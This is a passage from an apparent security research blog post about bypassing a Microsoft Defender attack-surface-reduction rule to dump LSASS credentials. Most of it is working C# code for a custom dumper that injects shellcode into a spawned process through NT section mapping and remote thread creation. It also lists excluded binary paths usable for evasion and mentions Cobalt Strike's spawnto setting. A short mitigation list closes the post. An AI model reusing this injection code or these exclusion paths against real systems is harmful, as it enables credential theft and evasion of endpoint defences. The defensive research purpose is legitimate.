IntPtr.Zero,
out _,
2,
0,
0x20); // PAGE_EXECUTE_READ
IntPtr outThread = IntPtr.Zero;
//Shellcode is now in the target process, execute it
uint x = nt.NtCreateThreadEx(
out outThread,
0x001F0000, // STANDARD_RIGHTS_ALL
IntPtr.Zero,
pi.hProcess,
remoteBaseAddress,
IntPtr.Zero,
false,
0,
0,
0,
IntPtr.Zero);
if (x == 0)
{
Console.WriteLine("Remote Thread created, status code: 0");
Thread.Sleep(7000);
nt.NtTerminateProcess(pi.hProcess, 0);
}
else
{
Console.WriteLine("[!] Error, Remote Thread FAILED, status code: 1");
}
}
}
}nt.cs
using System;
using System.Runtime.InteropServices;
namespace ldump
{
internal class nt
{
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFO
{
public int cb;
public IntPtr lpReserved;
public IntPtr lpDesktop;
public IntPtr lpTitle;
public int dwX;
public int dwY;
public int dwXSize;
public int dwYSize;
public int dwXCountChars;
public int dwYCountChars;
public int dwFillAttribute;
public int dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;
public bool bInheritHandle;
}
[DllImport("shell32.dll", CharSet = CharSet.Auto)]
public static extern bool IsUserAnAdmin();
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool CreateProcessW(
string lpApplicationName,
string lpCommandLine,
ref SECURITY_ATTRIBUTES lpProcessAttributes,
ref SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
uint dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
[DllImport("ntdll.dll")]
public static extern uint NtCreateSection(
ref IntPtr SectionHandle,
uint DesiredAccess,
IntPtr ObjectAttributes,
ref ulong MaximumSize,
uint SectionPageProtection,
uint AllocationAttributes,
IntPtr FileHandle);
[DllImport("ntdll.dll")]
public static extern uint NtMapViewOfSection(
IntPtr SectionHandle,
IntPtr ProcessHandle,
out IntPtr BaseAddress,
IntPtr ZeroBits,
IntPtr CommitSize,
IntPtr SectionOffset,
out ulong ViewSize,
uint InheritDisposition,
uint AllocationType,
uint Win32Protect);
[DllImport("ntdll.dll")]
public static extern uint NtCreateThreadEx(
out IntPtr threadHandle,
uint desiredAccess,
IntPtr objectAttributes,
IntPtr processHandle,
IntPtr startAddress,
IntPtr parameter,
bool createSuspended,
int stackZeroBits,
int sizeOfStack,
int maximumStackSize,
IntPtr attributeList);
[DllImport("ntdll.dll", SetLastError = true)]
public static extern uint NtTerminateProcess(
IntPtr hProcess,
int errorStatus);
}
}The results are displayed with green indicating success and red indicating failure.
%programfiles(x86)%\SolarWinds
For those who haven’t faced Cobalt Strike yet, the “spawnto” value controls which binary is used as a temporary process for any post-exploitation workflows.
c:\windows\system32\mrt.exe
c:\windows\system32\netstat.exe
c:\windows\system32\lpksetup.exe
c:\windows\system32\wbem\WmiPrvSE.exe
c:\windows\system32\CompatTelRunner.exe
c:\windows\system32\svchost.exe
c:\windows\system32\WerFaultSecure.exe
%programdata%\Citrix\Citrix Workspace *\TrolleyExpress.exe
Summary
In summary, we have organized our findings, identified new path exclusions, and successfully bypassed the ASR rule to dump LSASS. Additionally, we developed our own dumper using the process hollowing technique.
In this post, I focused on PathExclusions, but of course, there is still further research and work to be done. I’m confident there is much more to uncover.
This post also serves as a personal commitment for the New Year, as I am writing it on the evening of December 30th, 2024. Let this be a starting point for writing more and sharing interesting findings with the cybersecurity community. I hope you found it valuable or discovered something useful.
Mitigation
On the defense side, I recommend the following actions:
- Log and monitor process creation for any processes from the identified list.
- Enable LSA protection as soon as possible.
- Implement Credential Guard in your environment, if feasible.
- Restrict specific paths to binaries and enforce path-based rules to prevent execution using Windows Defender Application Control (WDAC).
Leave a Reply